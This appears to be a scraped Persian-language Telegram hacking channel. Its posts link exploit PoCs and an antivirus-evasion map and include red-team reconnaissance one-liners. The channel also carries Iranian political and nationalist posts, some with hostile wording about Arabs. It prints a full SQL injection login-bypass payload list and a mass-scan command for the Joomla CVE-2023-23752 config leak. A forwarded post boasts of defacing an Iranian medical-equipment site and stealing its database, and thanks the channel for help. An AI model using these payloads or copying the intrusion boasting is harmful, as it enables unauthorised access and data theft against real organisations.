DirtyCred-Zhenpeng.pdf
14.3 MB
2022-LPE-UAF
محققان امنیتی 3 آسیبپذیری را در کرنل لینوکس کشف کردند که به مهاجم محلی ( local ) اجازه میدهد دسترسی ها را افزایش دهد و به طور بالقوه کدهای مخرب را اجرا کند. کد اثبات مفهوم ( PoC )در دسترس عموم است و احتمال بهره برداری( exploitation ) در wild را افزایش می دهد.
https://github.com/greek0x0/2022-LPE-UAF
#privilege #vulnerability
@pfksecurity
محققان امنیتی 3 آسیبپذیری را در کرنل لینوکس کشف کردند که به مهاجم محلی ( local ) اجازه میدهد دسترسی ها را افزایش دهد و به طور بالقوه کدهای مخرب را اجرا کند. کد اثبات مفهوم ( PoC )در دسترس عموم است و احتمال بهره برداری( exploitation ) در wild را افزایش می دهد.
https://github.com/greek0x0/2022-LPE-UAF
#privilege #vulnerability
@pfksecurity
5 افزونه مفید برای موزیلا فایرفاکس
1. Cookie-Editor
- به شما امکان ایجاد، ویرایش و حذف کوکی ها برای هر صفحه را می دهد.
2. Proxy SwitchyOmega
- به شما امکان مدیریت و جابجایی بین بسیاری از پروکسی ها را می دهد.
3. Firefox Translations
- کل صفحه را به زبان مورد نیاز شما ترجمه می کند.
4. دسترسی به Rutreker
- به شما امکان می دهد بدون VPN / proxy / Tor به ردیاب تورنت افسانه ای دسترسی پیدا کنید.
5. Clear Browing Data
- تاریخچه، کوکی ها و کش را با یک کلیک پاک می کند.
#حریم_خصوصی
@PfkSecurity
1. Cookie-Editor
- به شما امکان ایجاد، ویرایش و حذف کوکی ها برای هر صفحه را می دهد.
2. Proxy SwitchyOmega
- به شما امکان مدیریت و جابجایی بین بسیاری از پروکسی ها را می دهد.
3. Firefox Translations
- کل صفحه را به زبان مورد نیاز شما ترجمه می کند.
4. دسترسی به Rutreker
- به شما امکان می دهد بدون VPN / proxy / Tor به ردیاب تورنت افسانه ای دسترسی پیدا کنید.
5. Clear Browing Data
- تاریخچه، کوکی ها و کش را با یک کلیک پاک می کند.
#حریم_خصوصی
@PfkSecurity
addons.mozilla.org
Cookie-Editor – Загрузите это расширение для 🦊 Firefox (ru)
Скачать «Cookie-Editor» для Firefox. Cookie-Editor lets you efficiently create, edit and delete a cookie for the current tab. Perfect for developing, quickly testing or even manually managing your cookies for your privacy.
Bypass-AV.png
2 MB
BypassAV.
این نقشه تکنیک های ضروری برای دور زدن آنتی ویروس و EDR را فهرست می کند.
https://github.com/CMEPW/BypassAV
#AV #Bypass #EDR
@Pfksecurity
این نقشه تکنیک های ضروری برای دور زدن آنتی ویروس و EDR را فهرست می کند.
https://github.com/CMEPW/BypassAV
#AV #Bypass #EDR
@Pfksecurity
Media is too big
VIEW IN TELEGRAM
هک با ChatGPT
- امنیت سایبری اتوماسیون Bash Script
- حل چالش CTF با ChatGPT
#ChatGPT #CTF #Hack
@pfksecurity
- امنیت سایبری اتوماسیون Bash Script
- حل چالش CTF با ChatGPT
#ChatGPT #CTF #Hack
@pfksecurity
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2022-34689
Windows CryptoAPI spoofing vulnerability.
https://github.com/akamai/akamai-security-research/tree/main/PoCs/CVE-2022-34689
@pfksecurity
Windows CryptoAPI spoofing vulnerability.
https://github.com/akamai/akamai-security-research/tree/main/PoCs/CVE-2022-34689
@pfksecurity
SQL Injection
آسیب پذیری SQL Injectionدر سیستم مدیریت پروژه R&D ZenTao
https://github.com/spmonkey/zentao_sql_poc
#SqlInjection
@PfkSecurity
آسیب پذیری SQL Injectionدر سیستم مدیریت پروژه R&D ZenTao
https://github.com/spmonkey/zentao_sql_poc
#SqlInjection
@PfkSecurity
GitHub
GitHub - spmonkey/zentao_sql_poc: 禅道研发项⽬管理系统sql注入漏洞
禅道研发项⽬管理系统sql注入漏洞. Contribute to spmonkey/zentao_sql_poc development by creating an account on GitHub.
چگونه یک شرکت را هک کردم (اولین تعامل تیم قرمز من 🚩 )
درود دوستان! اخیراً با اولین همکاری تیم قرمز خود مواجه شدم. مشتری این تعامل یک شرکت بزرگ فین تک با شبکه گسترده ای بود. رویکرد تعامل، انجام یک شبیهسازی دشمن با سناریوی نقض فرض کنید. این پست صرفاً روش تعاملی را که من به تنهایی دنبال میکنم توصیف میکند و ممکن است با دیدگاه سایر تیمهای قرمز متفاوت باشد.
شرکت مورد نظر دامنه های زیادی در اینترنت داشت و برنامه های مختلفی را برای کارمندان و مشتریان خود میزبانی می کرد. هر بخش از اطلاعات وب سایت برای یک تیم قرمز مهم است. پنتست برنامه وب نقش مهمی در هنگام انجام یک تعامل تیم قرمز بازی میکند. پس از جمع آوری اطلاعات از طریق اینترنت عمومی، با دامنه های مختلف دیگری که توسط شرکت استفاده می شود آشنا شدیم. برخی از تاکتیک های مهم شمارش که قبل از شروع به بررسی مستقیم شبکه داخلی شرکت باید انجام شود عبارتند از:
Subdomain Enumeration
GitHub Dorking
Shodan Dorking
Google Dorking
پنتست برنامه خارجی
آشنایی با معماری سازمانی
ما میتوانیم برنامههای مختلف (چه خارجی و چه داخلی) مورد استفاده توسط شرکت را با انجام شمارش گسترده زیر دامنه فهرست کنیم. مقیاس دامنه هدف فقط به طور تصادفی بر اساس سازمان در حین انجام شمارش دامنه فرعی گسترش می یابد.
برای شمارش دامنههای فرعی، من شخصاً از subfinder استفاده میکنم که با بسیاری از کلیدهای API یکپارچه شده است. همیشه خوب است که زیر دامنه ها را بررسی کنید، خواه از اینترنت عمومی در دسترس هستند یا خیر.
در اینجا زیر دامنه های زیادی را پیدا کردم که نام آنها برای برنامه های وب داخلی است که از اینترنت عمومی قابل دسترسی نیستند. اما اکثر آنها در دسترس هستند. بنابراین، زمان آن رسیده که این برنامه ها را بررسی کنید.
آزمایش این برنامهها کار خستهکنندهای بود، بیشتر آنها برنامههایی ثابت برای اهداف بازاریابی تجاری بودند. هرچه این ویژگی پویاتر باشد، برای ما جالب تر می شود. تیم ما آسیبپذیریهای برنامههای وب بسیاری را در گستره وسیع هدف پیدا کرده بود. من شخصاً دوست دارم برای SQL Injection، XML External Entity و Open Redirection برای تعاملات تیم قرمز آزمایش کنم. ممکن است فکر کنید، "چرا به طور خاص این اشکالات؟"
خوب، دلیل خوبی برای یافتن این اشکالات وجود دارد زیرا SQL Injection و XML External Entity حملاتی مبتنی بر تزریق هستند که به مهاجم کمک میکنند اطلاعات حساس را از Backend/Server، که دادههای بلادرنگی است که توسط شرکت استفاده میشود، بازیابی کند. این می تواند بیشتر برای حرکت جانبی در مرحله بعدی استفاده شود. و در دنیای امروز InfoSec، تغییر مسیر باز ممکن است به عنوان یک باگ معمولی تلقی شود، جایی که شکارچیان آن را عادی کردهاند. اما Red Teamers ارزش آن را میدانند، زیرا میتوان از آن برای جذب قربانی از شرکت استفاده کرد. قربانیان به راحتی فریب این توهم را می خورند زیرا هدایت مجدد به URL مخرب ما از نام دامنه سازمانی آنها انجام می شود. بیشتر کارمندان غیر فنی در یک شرکت از این روش استفاده می کنند. آسیبپذیریهای شناختهشده زیادی در طبیعت وجود دارد، اما این آسیبپذیریهای موردعلاقه من برای جستجو هستند، که میتوان به راحتی از آنها برای تعامل بیشتر استفاده کرد.
قسمت اول
@pfkSecurity
درود دوستان! اخیراً با اولین همکاری تیم قرمز خود مواجه شدم. مشتری این تعامل یک شرکت بزرگ فین تک با شبکه گسترده ای بود. رویکرد تعامل، انجام یک شبیهسازی دشمن با سناریوی نقض فرض کنید. این پست صرفاً روش تعاملی را که من به تنهایی دنبال میکنم توصیف میکند و ممکن است با دیدگاه سایر تیمهای قرمز متفاوت باشد.
شرکت مورد نظر دامنه های زیادی در اینترنت داشت و برنامه های مختلفی را برای کارمندان و مشتریان خود میزبانی می کرد. هر بخش از اطلاعات وب سایت برای یک تیم قرمز مهم است. پنتست برنامه وب نقش مهمی در هنگام انجام یک تعامل تیم قرمز بازی میکند. پس از جمع آوری اطلاعات از طریق اینترنت عمومی، با دامنه های مختلف دیگری که توسط شرکت استفاده می شود آشنا شدیم. برخی از تاکتیک های مهم شمارش که قبل از شروع به بررسی مستقیم شبکه داخلی شرکت باید انجام شود عبارتند از:
Subdomain Enumeration
GitHub Dorking
Shodan Dorking
Google Dorking
پنتست برنامه خارجی
آشنایی با معماری سازمانی
ما میتوانیم برنامههای مختلف (چه خارجی و چه داخلی) مورد استفاده توسط شرکت را با انجام شمارش گسترده زیر دامنه فهرست کنیم. مقیاس دامنه هدف فقط به طور تصادفی بر اساس سازمان در حین انجام شمارش دامنه فرعی گسترش می یابد.
cat targetDomains.txt | while read -r domain; do ( echo $domain | subfinder -silent >>subdomains.txt ); doneبرای شمارش دامنههای فرعی، من شخصاً از subfinder استفاده میکنم که با بسیاری از کلیدهای API یکپارچه شده است. همیشه خوب است که زیر دامنه ها را بررسی کنید، خواه از اینترنت عمومی در دسترس هستند یا خیر.
httpx کار را برای من انجام میدهد.cat subdomains.txt | httpx -silent -scدر اینجا زیر دامنه های زیادی را پیدا کردم که نام آنها برای برنامه های وب داخلی است که از اینترنت عمومی قابل دسترسی نیستند. اما اکثر آنها در دسترس هستند. بنابراین، زمان آن رسیده که این برنامه ها را بررسی کنید.
آزمایش این برنامهها کار خستهکنندهای بود، بیشتر آنها برنامههایی ثابت برای اهداف بازاریابی تجاری بودند. هرچه این ویژگی پویاتر باشد، برای ما جالب تر می شود. تیم ما آسیبپذیریهای برنامههای وب بسیاری را در گستره وسیع هدف پیدا کرده بود. من شخصاً دوست دارم برای SQL Injection، XML External Entity و Open Redirection برای تعاملات تیم قرمز آزمایش کنم. ممکن است فکر کنید، "چرا به طور خاص این اشکالات؟"
خوب، دلیل خوبی برای یافتن این اشکالات وجود دارد زیرا SQL Injection و XML External Entity حملاتی مبتنی بر تزریق هستند که به مهاجم کمک میکنند اطلاعات حساس را از Backend/Server، که دادههای بلادرنگی است که توسط شرکت استفاده میشود، بازیابی کند. این می تواند بیشتر برای حرکت جانبی در مرحله بعدی استفاده شود. و در دنیای امروز InfoSec، تغییر مسیر باز ممکن است به عنوان یک باگ معمولی تلقی شود، جایی که شکارچیان آن را عادی کردهاند. اما Red Teamers ارزش آن را میدانند، زیرا میتوان از آن برای جذب قربانی از شرکت استفاده کرد. قربانیان به راحتی فریب این توهم را می خورند زیرا هدایت مجدد به URL مخرب ما از نام دامنه سازمانی آنها انجام می شود. بیشتر کارمندان غیر فنی در یک شرکت از این روش استفاده می کنند. آسیبپذیریهای شناختهشده زیادی در طبیعت وجود دارد، اما این آسیبپذیریهای موردعلاقه من برای جستجو هستند، که میتوان به راحتی از آنها برای تعامل بیشتر استفاده کرد.
قسمت اول
@pfkSecurity
تو اینروزا که داریم تو سر و کله هم میزنیم
مجاهدین لایحه بردن کنگره واسه جمهوری دموکراتیک ایران و مریم رجوی رو هم بعنوان رهبر اپوزیسیون معرفی کردن .
دشمن ایران کیه ؟
مجاهد ، جمهوری اسلامی ، تجزیه طلب
وسلام
برید ایمیل بزنید 👇
https://www.congress.gov/bill/117th-congress/house-resolution/118/cosponsors?r=21&s=1&utm_source=clubhouse
@pfksecurity
مجاهدین لایحه بردن کنگره واسه جمهوری دموکراتیک ایران و مریم رجوی رو هم بعنوان رهبر اپوزیسیون معرفی کردن .
دشمن ایران کیه ؟
مجاهد ، جمهوری اسلامی ، تجزیه طلب
وسلام
برید ایمیل بزنید 👇
https://www.congress.gov/bill/117th-congress/house-resolution/118/cosponsors?r=21&s=1&utm_source=clubhouse
@pfksecurity
VPS-web-hacking-tools
Automatically install some web hacking/bug bounty tools for your VPS.
https://github.com/supr4s/VPS-web-hacking-tools
#VPS #hack
@PfkSecurity
Automatically install some web hacking/bug bounty tools for your VPS.
https://github.com/supr4s/VPS-web-hacking-tools
#VPS #hack
@PfkSecurity
GitHub
GitHub - supr4s/WebHackingTools: Automatically install some web hacking/bug bounty tools.
Automatically install some web hacking/bug bounty tools. - supr4s/WebHackingTools
Forwarded from تیم سایبری | Black Wolves
🔴Once again we hacked your server, yes we are!
Website : meymed.com
By infiltrating the country's medical equipment site again, we defaced the site and invited people to the call on 27th of Bahman, and obtained the database again.
We still took the server out of reach due to security issues!
We don't forgive, we don't forget...
Wait for us, we will come again...
Thanks to the pkfsecurity team for our cooperation.
🔴 بار دیگر سرور شما را هک کردیم ، بله ما هستیم !
سایت : meymed.com
با نفوذ دوباره به سايت تجهیزات پزشکی کشور سایت را دیفیس و مردم را به فراخوان ۲۷ بهمن دعوت کردیم ، و دیتابیس را بار دیگر به دست آوردیم .
همچنان به دلیل مسائل امنیتی سرور را از دسترس خارج کردیم !
نمیبخشیم ، فراموش نمیکنیم ...
منتظر ما باشید ، باز هم میایم ...
با تشکر از تیم pkfsecurity در همکاری ما .
⚫
Website : meymed.com
By infiltrating the country's medical equipment site again, we defaced the site and invited people to the call on 27th of Bahman, and obtained the database again.
We still took the server out of reach due to security issues!
We don't forgive, we don't forget...
Wait for us, we will come again...
Thanks to the pkfsecurity team for our cooperation.
🔴 بار دیگر سرور شما را هک کردیم ، بله ما هستیم !
سایت : meymed.com
با نفوذ دوباره به سايت تجهیزات پزشکی کشور سایت را دیفیس و مردم را به فراخوان ۲۷ بهمن دعوت کردیم ، و دیتابیس را بار دیگر به دست آوردیم .
همچنان به دلیل مسائل امنیتی سرور را از دسترس خارج کردیم !
نمیبخشیم ، فراموش نمیکنیم ...
منتظر ما باشید ، باز هم میایم ...
با تشکر از تیم pkfsecurity در همکاری ما .
⚫
BLACK WOLVES TEAM ⚫۲۵ بهمن ماه سالگشت جنگ #نهاوند
جنگی که چیرگی بر شکوه و بزرگی، جشنها، شادمانیها، راستیها، درستیها، نیکیها، ارزشها و منش ایرانی انسانی بود و آغاز فرومایگی، واپسگرایی، خرافات، یاوهها، خردباختگی، خودباختگی خودفروشی، دروغ، نیرنگ، خواری، پستی، بیاعتباری و بیارزشی و...
٢۵بهمن ماه سالگشت جنگ نهاوند روز به سوگ نشستن است. روز نسلکشی ایرانیان بدست اعراب مسلمان که کشتارها بسیار فراوان کردند. چپاولها و غارتها کردند، ویرانیها کردند و سوزاندند. مردان و پسران ایرانی را به اسارت گرفتند و نوکری گماشتند. دختران و زنان ایرانی را به بند کشیدن و به بردهگی بردن و آنان را در بازار مدینه و مکه به فروش رساندند.
آری ١٣۸۲سال پیش در چنین روزی ایرانیان نیک سرشت در جنگ نهاوند از اعراب مسلمان عربستان اهریمن شکست خوردند تا که #فرهنگ_ناب، #تمدن_بزرگ، #تاریخ_کهن و #آیین نیک نیاکان ایرانیمان گرفتار شود. درود بر زنان و مردان ایرانی که در برابر تازیان مسلمان از همان زمان تاکنون تا پای جان ایستادند و جانفشانی کردند.
یاد و نامشان جاودان 🥀
#نهاوند #قادسیه #واجرود #جلولا #سیستان #تبرستان
@PfkSecurity
جنگی که چیرگی بر شکوه و بزرگی، جشنها، شادمانیها، راستیها، درستیها، نیکیها، ارزشها و منش ایرانی انسانی بود و آغاز فرومایگی، واپسگرایی، خرافات، یاوهها، خردباختگی، خودباختگی خودفروشی، دروغ، نیرنگ، خواری، پستی، بیاعتباری و بیارزشی و...
٢۵بهمن ماه سالگشت جنگ نهاوند روز به سوگ نشستن است. روز نسلکشی ایرانیان بدست اعراب مسلمان که کشتارها بسیار فراوان کردند. چپاولها و غارتها کردند، ویرانیها کردند و سوزاندند. مردان و پسران ایرانی را به اسارت گرفتند و نوکری گماشتند. دختران و زنان ایرانی را به بند کشیدن و به بردهگی بردن و آنان را در بازار مدینه و مکه به فروش رساندند.
آری ١٣۸۲سال پیش در چنین روزی ایرانیان نیک سرشت در جنگ نهاوند از اعراب مسلمان عربستان اهریمن شکست خوردند تا که #فرهنگ_ناب، #تمدن_بزرگ، #تاریخ_کهن و #آیین نیک نیاکان ایرانیمان گرفتار شود. درود بر زنان و مردان ایرانی که در برابر تازیان مسلمان از همان زمان تاکنون تا پای جان ایستادند و جانفشانی کردند.
یاد و نامشان جاودان 🥀
#نهاوند #قادسیه #واجرود #جلولا #سیستان #تبرستان
@PfkSecurity
SQL injection auth bypass list
@PfkSecurity
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
#sqli #SqlInjection@PfkSecurity
CVE-2023-23752
Joomla webservice endpoint access
PoC
#cve
@pfksecurity
Joomla webservice endpoint access
PoC
httpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'#cve
@pfksecurity
🔥 اسپندگان فرخ باد 🔥
💠 جشن اسپندگان، روز اسپند از ماه اسپند، یکی از جشن های باستانی ایران است که برابر گاهشماری زرتشتی که دوازده ماه ۳۰ روزه دارد، پنجمین روز در ماه اسپند بوده ولی در تقویم ایران که خورشیدی است و شش ماه نخست سال ۳۱ روز دارد، روز ۲۹ بهمن خورشیدی جای گرفته است و این شش روز اختلاف میان گاهشماری زرتشتی و خورشیدی به خاطر همان شش ماه نخست سی و یک روزه در گاهشمار خورشیدی است.
💠 واژه «اسپند» در اوستا به ریخت (شکل) «سپندارمز» آمده و در سرودهای زرتشت (گاتها) «سپَنتَ آرمَیتی» است. سپنته به معنی مقدس و آرمیتی به معنی آرمان و اشغ (عشق) پاک است. این ویژگی، چهارمین گام رازوری (عرفان) در باور مزدیسنان بوده و یکی از فروزه های برگرفته از راز اهورامزدا است. سپنته آرمیتی در جهان مینُوی، نماد بردباری، فروتنی، فدا شدن و از خود گذشتگی است و از آنجا که این ویژگی های نیک را بیشتر در بانوان می توان مشاهده کرد، این جشن را به زنان نسبت داده اند و چون برخی از ویژگی های بانوان مانند زایندگی، پروراندن، فروتنی و شکیبایی را زمین نیز در خود دارد، جشن اسپندگان جشن پاسداشت زمین و بزرگداشت جایگاه زنان نیک است.
در گاهشماری ترادادی (سنتی) زرتشتی، دوازدهمین ماه از سال و پنجمین روز از هر ماه «اسپند» نام دارد، از این روی در روز اسپند از ماه اسپند، پیش از فرا رسیدن بهار و پیدایش گل و گیاه همراه با شور اشغ در هستی، بالندگی زاستار (طبیعت) و نوشدن زمین «جشن اسفندگان» بر پا می گردد.
💠 بانوان ایرانی در جشن اسپندگان، پس از نیایش، پوشش نو بر تن کرده، خود را می آراستند. در چنین روزی دست از کار همیشگی کشیده به شادی و پایکوبی می پرداختند. دختران و بانوان در جشن اسپندگان دسته های گل را به آغوش می گرفتند که شایستگی آن را داشته باشند.
🔥 جشن اسپندگان،
روز اسپند از ماه اسپند،
گاه بزرگداشت زنان،
هنگام پاسداشت زمین،
گاه رهایی و شادی بانوان،
جلوه گاه آرمان و اشغ پاک،
روز مادر، روز مهر،
پیشاپیش
بر بانوان مهر پرور گیتی فرخنده باد.
#اسفندگان
#سپندارمز
#سپندارمزگان
#جشن_های_ایرانی
@pfksecurity
💠 جشن اسپندگان، روز اسپند از ماه اسپند، یکی از جشن های باستانی ایران است که برابر گاهشماری زرتشتی که دوازده ماه ۳۰ روزه دارد، پنجمین روز در ماه اسپند بوده ولی در تقویم ایران که خورشیدی است و شش ماه نخست سال ۳۱ روز دارد، روز ۲۹ بهمن خورشیدی جای گرفته است و این شش روز اختلاف میان گاهشماری زرتشتی و خورشیدی به خاطر همان شش ماه نخست سی و یک روزه در گاهشمار خورشیدی است.
💠 واژه «اسپند» در اوستا به ریخت (شکل) «سپندارمز» آمده و در سرودهای زرتشت (گاتها) «سپَنتَ آرمَیتی» است. سپنته به معنی مقدس و آرمیتی به معنی آرمان و اشغ (عشق) پاک است. این ویژگی، چهارمین گام رازوری (عرفان) در باور مزدیسنان بوده و یکی از فروزه های برگرفته از راز اهورامزدا است. سپنته آرمیتی در جهان مینُوی، نماد بردباری، فروتنی، فدا شدن و از خود گذشتگی است و از آنجا که این ویژگی های نیک را بیشتر در بانوان می توان مشاهده کرد، این جشن را به زنان نسبت داده اند و چون برخی از ویژگی های بانوان مانند زایندگی، پروراندن، فروتنی و شکیبایی را زمین نیز در خود دارد، جشن اسپندگان جشن پاسداشت زمین و بزرگداشت جایگاه زنان نیک است.
در گاهشماری ترادادی (سنتی) زرتشتی، دوازدهمین ماه از سال و پنجمین روز از هر ماه «اسپند» نام دارد، از این روی در روز اسپند از ماه اسپند، پیش از فرا رسیدن بهار و پیدایش گل و گیاه همراه با شور اشغ در هستی، بالندگی زاستار (طبیعت) و نوشدن زمین «جشن اسفندگان» بر پا می گردد.
💠 بانوان ایرانی در جشن اسپندگان، پس از نیایش، پوشش نو بر تن کرده، خود را می آراستند. در چنین روزی دست از کار همیشگی کشیده به شادی و پایکوبی می پرداختند. دختران و بانوان در جشن اسپندگان دسته های گل را به آغوش می گرفتند که شایستگی آن را داشته باشند.
🔥 جشن اسپندگان،
روز اسپند از ماه اسپند،
گاه بزرگداشت زنان،
هنگام پاسداشت زمین،
گاه رهایی و شادی بانوان،
جلوه گاه آرمان و اشغ پاک،
روز مادر، روز مهر،
پیشاپیش
بر بانوان مهر پرور گیتی فرخنده باد.
#اسفندگان
#سپندارمز
#سپندارمزگان
#جشن_های_ایرانی
@pfksecurity
دسترسی به شبکه Cloudflare از ساعاتی پیش در بسیاری از ISPهای داخل #ایران محدود شده است.
https://twitter.com/NarimanGharib/status/1627004712678457344
https://twitter.com/NarimanGharib/status/1627004712678457344
X (formerly Twitter)
Nariman Gharib (@NarimanGharib) on X
Access to @Cloudflare network has been restricted in many ISPs inside #Iran since a few hours ago.
#Filternet
#Filternet
This media is not supported in your browser
VIEW IN TELEGRAM
جشن سپندارمذگان جشن اصیل ایرانی (روز عشق به تاریخ ایران باستان)
نه به ولنتاین و فرهنگ غربی
درود بر فرهنگ اصیل ایرانی
۱۹ فوریه روز سپندارمذگان رو تبریک عرض مینماییم
#جشن #جشن_های_ایرانی
@PfkSecurity
نه به ولنتاین و فرهنگ غربی
درود بر فرهنگ اصیل ایرانی
۱۹ فوریه روز سپندارمذگان رو تبریک عرض مینماییم
#جشن #جشن_های_ایرانی
@PfkSecurity